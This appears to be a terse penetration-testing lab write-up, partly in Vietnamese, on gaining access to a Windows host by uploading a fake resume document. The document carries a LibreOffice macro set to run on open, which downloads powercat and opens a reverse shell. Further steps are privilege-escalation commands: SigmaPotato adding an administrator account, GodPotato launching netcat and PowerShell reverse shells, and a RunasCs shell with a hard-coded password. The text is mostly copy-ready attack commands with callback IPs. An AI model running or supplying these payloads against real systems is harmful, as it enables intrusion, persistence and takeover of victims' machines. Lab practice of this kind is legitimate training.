Skip to main content

Craft - ms word upload - printspoofer - vba macro

Enum

nmap

ODT file

Next we are going to create a fake resume. Open a new document.

Press enter or click to view image in full size

That should be enough right? For our purposes a Blank document might be best. Either way save it. Go to Tools → Macros → Organize Macros → Basic

Select your document, then New, and give it a name.

This will open up a work space. We will embed the following command in our macro. This will simply call back to our machine. It’s a test.

Shell("cmd /c powershell iwr http://192.168.45.154/") Press enter or click to view image in full size

Be sure to save your macro and then your document. Then go back to the document (Dork-resume), select Tools and Customize.

Select Open Document then Assign Macro…

Select the Macro (Evil) that we created for our document and OK.

Note that the macro is now assigned to the action.

Close it by selecting OK again and save the document (Dork-resume)

Now we set up a netcat listener on port 80. This will tell us if our macro works.

sudo nc -lvnp 80 Go back to the web page and upload the newly created resume.

Shell("cmd /c powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.45.154/powercat.ps1');powercat -c 192.168.45.154 -p 135 -e powershell")

Vào thư muc web upload shell lên web rồi listent sau khi chạy shell

.\SigmaPotato "net user dave4 lab /add"

.\SigmaPotato "net localgroup Administrators dave4 /add"

Upload godpotatoes, netcat Sau đó chạy netcat god potatoes

GodPotato.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe <LHOST> <LPORT>"

hint check .NET version

reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s

GodPotato-NET4.exe -cmd "nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.250 4445"

stable

GodPotato-NET4.exe -cmd "powershell -NoP -NonI -W Hidden -c \"$client = New-Object System.Net.Sockets.TCPClient('192.168.45.250',4445);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length)}\""

hint lấy window ver

wmic os get osarchitecture

whoami not working

echo %USERNAME%
BILLYBOSS$

C:\Windows\System32\config\systemprofile>
C:\Windows\System32\config\systemprofile>echo %USERDOMAIN%\%USERNAME%

echo %USERDOMAIN%\%USERNAME%
WORKGROUP\BILLYBOSS$


.\RunasCs.exe administrator admin@123 cmd.exe -r 192.168.45.161:80